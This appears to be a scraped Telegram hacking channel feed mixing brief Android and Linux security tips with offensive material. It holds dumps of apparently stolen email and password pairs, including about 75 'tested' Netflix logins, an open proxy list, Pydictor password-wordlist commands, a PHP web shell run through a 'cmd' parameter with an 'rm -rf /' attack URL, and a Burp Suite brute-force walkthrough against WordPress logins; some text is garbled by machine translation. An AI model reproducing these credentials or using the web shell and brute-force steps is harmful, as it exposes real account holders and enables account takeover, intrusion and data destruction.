UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Android Popular surface adjustments or hacks :
instagram.com/undercodeTesting

> developers use several popular applications to hack Android devices to make them faster, extend battery life, and customize screen savers, ringtones, alerts, and more.

> The list of hackers that can be used to improve Android is large and growing every day. Depending on what the hacker can do, the adjustment or hacking can be superficial or the type of hacking system.

πŸ¦‘ Popular surface adjustments or hacks are:

1) Tusker-for location-based automation
Ability to install custom keyboards such as Swype and SwiftKey

2) Deep system adjustments include downloading new cores and radios to increase speed and battery life
Unfortunately, there are many hackers with malicious intent that can and do invade Android devices to steal valuable personal information or profit from illegal financial transactions.

> Although it may be difficult (or even impossible) to make your Android unattackable, you can take some measures to improve the security of your device.

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Three major hacking threats to Android by undercode :


1) Data in transit: Android devices and mobile devices are often particularly vulnerable because they only use wireless communication and often use public WiFi, which may be unsafe. The attack often used by hackers is a man-in-the-middle attack.

> The attacker breaks into the device and redirects the data to use the resources on it, and then forwards it to the original target. This method allows hackers to monitor Internet browsing activity, steal keystrokes to identify passwords and isolate individuals' physical locations, and possibly listen to calls and block text.

2) Third-party apps: In a recent study, 57% of malicious apps in the Android market were found in third-party app stores.

3) SMS Trojan Horse: By including advanced dialing features in the Trojan Horse application, an attacker can run the victim's phone bill and have the mobile operator collect and distribute funds to them. Another malicious use of SMS involves using an infected device to send SMS text messages to all contacts in the address book, which contains links that trick the recipient to download and install the worm, infecting many devices at once.

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ You can take three steps to protect your Android device :


1) SSL encryption of the device: SSL is one of the best ways to protect sensitive data in transit.

2) Test third-party apps: Try to install apps from first-party vendors such as Google. If you do purchase the application from a third-party store, please use the mobile security vendor to audit the security / authenticity of any third-party code / library used in the mobile application. Read the permissions required by the application before downloading. Examples of applications that a permission application can request may trigger red flags are permission to disclose your identity or location or send mail to the Internet.

3) Be wary of SMS Trojan horses: implement control measures to prevent unauthorized access to paid resources. If you request payment via SMS, please proceed with caution.

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Pydictor's create a great wordlist for hack :


> This is a special tool because it is the only tool that creates word lists in ordinary words and base64 encryption.

> Therefore, if someone is smart enough to maintain a secure password, this tool will help you. Pydictor is written in python. There are two ways to use this tool to crack passwords: one to create a normal wordlist, and the other to create a base64 form of wordlist.

> We will try these two methods. But first of all, this is a third-party tool, so we must install it, for this please enter:

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https : // github . Com / LandGrey / pydictor . Git

2) Once the tool is installed and ready to use, give instructions according to the instructions you want it to generate a word list. First understand the syntax:

3) . / Pydictor . Py - len < min > < max > - Base D - O < path >
./pydictor.py-launch the tool
-len- indicates the length of the character
<min> -Here, the minimum character length is given
<max> -Here, the maximum character length is given
-o- indicates the path
<path> -Here, provide the path where you want to save the wordlist
Let us now give a command to generate a list of words:
. / Pydictor . Py - len 5 5 - Base d - O / root / Desktop / dict . TXT

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
akdavis@seidata.com:Grinnell2012
emil-lauzon@hotmail.com:Batman6421
cwolfe12898@gmail.com:arma12898
evil_knight69@hotmail.com:Dargo123
jeremy.chappell2@gmail.com:Chappell88
wellnitz10@gmail.com:password16
ricardovdoort@gmail.com:ToY25092000
roguefeebo@yahoo.com:Morgan107
gpxdiamonds@gmail.com:Cu3rv02251


πŸ¦‘tested @UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ New Netflix Accounts TESTED Β» DON T CHANGE PASSWORDS !!!!! :

sbentley97@yahoo.com:kendall07 | Standard
kelliryoung18@yahoo.com:ky012890 | Standard
miller_geo@yahoo.com:windom | Standard
dream4life342@yahoo.com:123bones | Standard
javil.seaton@yahoo.com:netwet2323 | Standard
lrayniak@yahoo.com:kittensk1 | Standard
cpdevelopers@yahoo.com:gold379 | Standard
jonahhunt@yahoo.com:jackdaniels | Standard
dafbs1977@yahoo.com:oc505900 | Standard
eddygarcia1967@yahoo.com:death2all | Standard
minsue232@yahoo.com:0chase3 | Standard
satish_maduri2002@yahoo.com:silverline | Standard
Hurricanej1993@yahoo.com:Jdmda1993 | Standard
daniels_cheyenne@yahoo.com:david05 | Basic
tash1985_12@yahoo.com:lgn2007b | Premium
dawn.fougere@yahoo.ca:Hunter14 | Standard
ayushdad@yahoo.com:martha1$ | Standard
abelpreci@yahoo.com:corvette | Standard
protectwildhorses@yahoo.com:br4tzb4by | Standard
daddyp29@yahoo.com:jamband | Premium
tivonda@yahoo.com:teejay | Standard
changjenny95@yahoo.com.tw:k50404050 | Standard
scheurersteven@yahoo.com:Steveo19 | Standard
krystal_schulte@yahoo.com:sparkles182 | Standard
tsuzi2005@yahoo.com:go2here | Standard
megan_oc@yahoo.com:silve9r | Standard
pereiravdb@yahoo.com.br:moki77 | PadrΓ£o
staceerohn@yahoo.com:court12 | Premium
anthonyp2859@yahoo.com:aap2859 | Standard
gem.mago@yahoo.com:agom1975 | Premium
billiedunn123@yahoo.com:richard1 | Standard
kaeleejae@yahoo.com:120970 | Premium
blueskyrabbitry@yahoo.com:boogaboo1205 | Standard
maggiemaesbackup@yahoo.com:alabama08 | Premium
erin.denton@yahoo.com.au:191189 | Standard
verum105@yahoo.com:Blondon24 | Standard
shaunmyburgh@yahoo.com:blackcat | Premium
jones.dustin82@yahoo.com:sound1wave | Standard
kaskhaanthony@yahoo.com:kst1535 | Standard
josh.butler1066@yahoo.com:farmall | Standard
kimkesling@yahoo.com:Kt101001 | Premium
lilandria_s@yahoo.com:haruka | Standard
kristee727@yahoo.com:travel | Standard
jsd061984@yahoo.com:june2306 | Standard
herrvisa@yahoo.com:g0atr0pe | Standard
abunton7100@yahoo.com:amberpoo | Basic
dominiquejones17@yahoo.com:65606560 | Standard
a1cberry_asm@yahoo.com:77camaro | Standard
laurafettig02@yahoo.com:Lfettig9849 | Standard
sjhalltenn@yahoo.com:travel | Standard
sp3ctre31@yahoo.com:bobsters31 | Standard
philip64485@yahoo.com:gracie64469 | Basic
lkincaid62@yahoo.com:pudding | Standard
md2hanif@yahoo.com:noppi123 | Standard
tonyw6568@yahoo.com:volsr1 | Premium
cesarepm69@yahoo.com.br:tracatra | PadrΓ£o
stormcraz@yahoo.com:taylor73 | Standard
nannayoyo@yahoo.com:120480 | Standard
babybluetwu@yahoo.com:twoblue2 | Basic
jaguevi@yahoo.com:Arma6757 | Standard
mariana_monna@yahoo.com.br:19512311 | PadrΓ£o
fianne9999@yahoo.com:fred1234 | Standard
fulmenus_2000@yahoo.com:st96h645 | Standard
MALLO12Y_N@yahoo.com:mmn4563 | Basic
siobhan_mcnab@yahoo.com:cerysbaby1 | Standard
michaelrcaskey@yahoo.com:bianca01 | Standard
seidi100@yahoo.com:lukas1 | Standard
robinlorenish@yahoo.com:snickers | Basic
andrewporto@yahoo.com:oracle11 | Standard
foryulia@yahoo.com:kozel926 | Standard
cssdy_mlss@yahoo.com:purju227 | Standard
tmsinetown@yahoo.com:cooper | Standard
nadineocker@yahoo.com:1Xterra2 | Standard
ansley.white@yahoo.com:MCRmy!81112 | Standard
gaikann@yahoo.com:lemontea456 | Standard

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘PREMIUM PROXIES CHECKED BY UNDERCODERS :


118.69.50.154:80 anonymous Apr-19, 16:01 Vietnam Ho Chi Minh City FPT Telecom
203.19.92.3:80 anonymous Apr-19, 15:37 Australia Kahibah Tomago Aluminiu...
203.19.88.59:80 anonymous Apr-19, 01:01 Australia Kahibah Tomago Aluminiu...
37.120.192.154:8080 anonymous Apr-19, 02:13 Netherlands Amsterdam Secure Data Sys...
51.158.98.121:8811 anonymous Apr-19, 20:50 France Paris Department for ...
51.158.123.250:8811 anonymous Apr-18, 23:02 France Paris Department for ...
165.255.73.128:53281 elite Apr-19, 06:26 South Africa Johannesburg Axxess Networks
103.83.116.3:55443 elite Apr-19, 20:06 Indonesia
91.230.44.133:3128 elite Apr-19, 13:12 Slovakia Bratislava ASITPRO
202.147.207.253:38646 elite Apr-18, 22:09 Indonesia Jakarta MNC Playmedia
94.229.32.85:3128 elite Apr-19, 04:10 Slovakia Dunajska Luzna DataNetworks s....
158.255.249.58:38914 elite Apr-19, 19:15 Slovakia PreΕ‘ov PRESNET s.r.o.
41.79.197.150:8080 elite Apr-18, 21:40 Somalia Merca Somcable
188.156.240.240:8118 elite Apr-19, 15:08 Hungary Szeged Magyar Telekom
102.164.214.225:55034 elite Apr-19, 15:49 South Africa Leslie
185.63.46.205:57100 elite Apr-19, 00:34 Hungary Hodmezovasarhely MVM Partner Ene...
85.159.48.170:40014 elite Apr-19, 09:31 Hungary Com.unique Tele...
94.21.118.140:48322 elite Apr-19, 07:11 Hungary Paszto DIGI Tavkozlesi...
91.82.49.138:57560 elite Apr-19, 13:17 Hungary Apostag Invitel Tavkozl...
102.164.202.80:34934 elite Apr-19, 09:10 South Africa Volksrust
78.41.174.196:8081 elite Apr-19, 07:11 Slovakia Horny Bar RadioLAN
36.55.230.146:8888 elite Apr-19, 00:19 Japan Kanazawa FreeBit Co.,Ltd.
126.29.117.191:80 elite Apr-19, 01:06 Japan Iwata Softbank BB Corp
61.118.35.94:55725 elite Apr-19, 19:07 Japan Tokyo NTT
124.219.176.139:39589 elite Apr-19, 19:12 Japan Chiba Sony Network Co...
74.116.59.8:53281 elite Apr-19, 15:30 Jamaica Island Networks
81.174.11.159:31194 elite Apr-18, 22:09 Italy NGI SpA
185.25.206.192:8080 elite Apr-19, 16:01 Italy Servereasy di G...
147.91.111.133:37979 elite Apr-19, 01:09 Serbia Akademska mreza...
212.43.123.18:41258 elite Apr-19, 01:11 Italy Basciano Quipo
192.117.146.110:80 elite Apr-19, 00:55 Israel Haifa 012 Smile
82.166.105.66:44081 elite Apr-19, 07:24 Israel Gannot 013 NetVision
52.31.193.74:8118 elite Apr-19, 07:02 Ireland Dublin Amazon Technolo...
185.138.123.78:55337 elite Apr-19, 19:24 Iraq Horizon Scope M...
5.160.240.201:53281 elite Apr-19, 06:11 Iran, Islamic Republic of Respina Network...
91.106.86.212:8080 elite Apr-18, 22:09 Iran, Islamic Republic of PJSC Badr Rayan...
94.229.32.86:3128 elite Apr-19, 07:03 Slovakia Dunajska Luzna DataNetworks s....
159.138.1.185:80 elite Apr-19, 09:22 Singapore Rouge Steel Co.
47.90.54.45:8080 elite Apr-19, 12:30 Hong Kong Alibaba
58.153.226.151:8080 elite Apr-19, 09:29 Hong Kong Kowloon Netvigator
84.75.4.177:80 elite Apr-19, 19:06 Switzerland Lenzburg upc cablecom GmbH
41.139.9.47:8080 elite Apr-19, 19:06 Ghana Accra Teledata ICT Ltd
94.130.179.24:8017 elite Apr-19, 18:39 Germany Gera D2 Internationa...
178.63.246.83:8118 elite Apr-19, 13:03 Germany Hetzner Online ...
94.130.179.24:8010 elite Apr-19, 00:54 Germany Gera D2 Internationa...
94.130.179.24:8026 elite Apr-19, 12:53 Germany Gera D2 Internationa...
94.130.179.24:8047 elite Apr-19, 06:43 Germany Gera D2 Internationa...
106.104.151.142:58198 elite Apr-18, 21:32 Taiwan Taipei New Century Inf...
178.134.155.82:48146 elite Apr-19, 00:35 Georgia Tbilisi JSC Silknet
212.72.159.22:30323 elite Apr-18, 22:08 Georgia Tbilisi Caucasus Online...
122.116.1.83:38680 elite Apr-19, 20:05 Taiwan Taoyuan District HiNet
188.169.123.54:8080 elite Apr-19, 04:05 Georgia Tbilisi JSC Silknet
37.187.4.81:8118 elite Apr-19, 06:17 France OVH SAS
163.172.135.104:80 elite Apr-19, 15:39 United Kingdom Scaleway
188.165.141.114:3129 elite Apr-19, 04:07 France OVH SAS
79.129.117.118:32281 elite Apr-19, 00:15 Greece Nemea OTEnet S.A.
46.246.26.98:8118 elite Apr-19, 09:37 Sweden Portlane Ab
47.52.231.140:8080 elite Apr-19, 10:20 Hong Kong Alibaba
203.218.82.127:8080 elite Apr-19, 01:12 Hong Kong Central Netvigator
159.138.3.119:80 elite Apr-19, 13:16 Singapore Rouge Steel Co.
213.98.67.40:41005 elite Apr-18, 22:22 Spain Mijas Telefonica de E...
190.6.200.158:38256 elite Apr-19, 00:03 Honduras San Pedro Sula Sulanet SA / In...
213.96.26.70:46860 elite Apr-19, 09:09 Spain L'Hospitalet de Llobregat Telefonica de E...
109.167.113.9:51857 elite Apr-19, 04:22 Spain Adamuz ServiHosting Ne...
46.246.42.60:8118 elite Apr-19, 10:10 Sweden Portlane Ab
81.236.13.23:32500 elite Apr-19, 12:56 Sweden Γ„ngelholm TeliaSonera AB

πŸ¦‘ CHecked as fast proxies by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘all accounts Checked ... more for later
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘small tip :How to prevent Linux hackers from attacking

Linux Hacking takes advantage of vulnerabilities in the operating system. Organizations can adopt the following strategies to protect themselves from such attacks.

1) Patch management -Patches fix bugs that attackers use to damage the system. A good patch management strategy will ensure that you continue to apply relevant patches to your system.

2)Appropriate operating system configuration -Other vulnerabilities ex ploit the weakness of server configuration. Inactive user names and daemons should be disabled. The default settings should be changed, such as common passwords for applications, default user names, and certain port numbers.

3) Intrusion detection system -This type of tool can be used to detect unauthorized access to the system. Some tools can detect and prevent such attacks.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Using PHP to crack Ubuntu Linux system :

In this actual scenario, we will provide you with basic information on how to use PHP to destroy Linux. We will not target any victims. If you want to give it a try, you can install LAMPP on your local computer.
PHP comes with two functions that can be used to execute Linux commands. It has exec () and shell_exec () functions. The function exec () returns the last line of the command output, and shell_exec () returns the entire result of the command as a string.

> For demonstration purposes, let us assume that the attacker administrator uploads the following files on the web server.

<? PHP $ cmd = isset ($ _ GET ['cmd'])? $ _GET ['cmd']: 'ls -l'; echo "execute shell command:-> $ cmd </ br>"; $ output = shell_exec ($ cmd); echo "
<pre> $ output </ pre> ";? > Here the above script gets the command from the GET variable named cmd. The command is executed using shell_exec () and returns the result in the browser. You can use the above code to use the following URL HTTP: //localhost/cp/konsole.php CMD = LS% 20 liters here,





"... konsole.php? Cmd = ls% 20-l" assigns the value ls -l to the variable cmd .
πŸ¦‘ The command executed on the server will be

shell_exec ('ls -l');
executing the above code on the web server will produce results similar to the following :
πŸ¦‘The above command only displays the files and permissions in the current directory.
Suppose the attacker uses the following command

rm -rf /
here,
"Rm" delete file
"Rf" causes the rm command to run in recursive mode. Delete all folders and files
"/" Instructs the command to start deleting files from the root directory
The attack URL looks like this
HTTP: //localhost/cp/konsole.php CMD = RM% 20-RF% 20 /
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Burp Suite violent attacks for wordpress :
fb.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) make Burp Suite work properly, first of all, we need to open the manual proxy, then go to Settings ( Settings ) and select "Preferences" ( the Preferences ).

2) Then select the advanced (advanced) option, go further to the network ( Network ), and then select the settings ( settings ) .
Description: Practical penetration tool: 5 ways to use Burpsuite to brute force WordPress

3) Now, choose Manual Proxy Configuration ( Manual Proxy the Configuration ) Type your local host address in the HTTP Proxy tab, and the port is set to 8080. Click OK

4) Now open WordPress on your computer and it will ask for your username and password. Here, start the burp suite before giving the username and password and select the Proxy tab and turn on interception by clicking the Interception on on / off button.

5) When you turn on interception, then type in any password predicted so that the burp suite can capture it. Look at the image. Please note that the last line to get the data shows that I tried to log in as the username and password by type admin: admin .

6) Space by right-clicking and select Send to Intruder option or just press ctrl + i captured material sent to the intruder ( Send to Intruder )

7) Now open Intruder tab, then select the Positions tab without disturbing data click on the right side of the frame clear button ( the Clear the Button ) .


8) now click the right side of the frame Add button ( the Add the Button ) . This configures where to insert the payload into the basic request.

9) Select the attack type to determine how to distribute the payload to the payload location. I will choose a cluster bomb ( cluster bomb ), because the number of payload sets depends on the type of attack, we have 2 payload locations. Click to start attacking ( Start Attack ).

10) Click payload set ( payload SET ) , the two numbers 1 and 2 show, for the first payload position of the number 1 . Click the further payload option ( payload the Option ) in the load button , and configure the payload as a simple list of strings, or only add any path name of the user dictionary.

> Similarly, select the number 2 for another payload location and add any password-only dictionary path. Click to start attacking ( Start Attack ) . Now the brute force attack will match the combination of the two payloads and try to log in with a username and password. When the attack is over, you will obtain certain credentials by checking the status and length , which will be different from other combinations. From the result user: bitnami is the username and password respectively .

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁